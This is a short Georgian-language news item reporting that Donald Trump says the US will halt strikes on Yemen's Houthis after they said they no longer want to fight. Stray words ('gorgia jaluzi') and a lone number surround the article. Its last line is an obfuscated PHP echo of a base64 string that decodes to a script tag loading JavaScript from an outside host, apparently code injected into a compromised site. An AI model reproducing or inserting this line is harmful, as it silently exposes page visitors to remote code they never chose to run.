gorgia
jaluzi

აშშ-ის პრეზიდენტის, დონალდ ტრამპის განცხადებით, აშშ იემენში ირანის მიერ მხარდაჭერილი „ჰუსიტების“ წინააღმდეგ დაბომბვებს შეაჩერებს, - ინფორმაციას CNN-ი ავრცელებს.

აშშ-ის პრეზიდენტის განმარტებით, გადაწყვეტილების მიზეზი „ჰუსიტების“ განცხადებაა, რომ მათ ბრძოლა აღარ სურთ.

„ჩვენ პატივს ვცემთ ამას და შევაჩერებთ დაბომბვებს“, - განაცხადა ტრამპმა.

აშშ-ის პრეზიდენტმა იგულისხმა სამხედრო კამპანია, რომელსაც აშშ „ჰუსიტების“ წინააღმდეგ მარტის შუა რიცხვებიდან ახორციელებს და რომელიც არის პასუხი ჯგუფის მიერ წითელ ზღვაში საზღვაო მარშრუტებსა და ისრაელის წინააღმდეგ განხორციელებულ თავდასხმებზე.

106
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");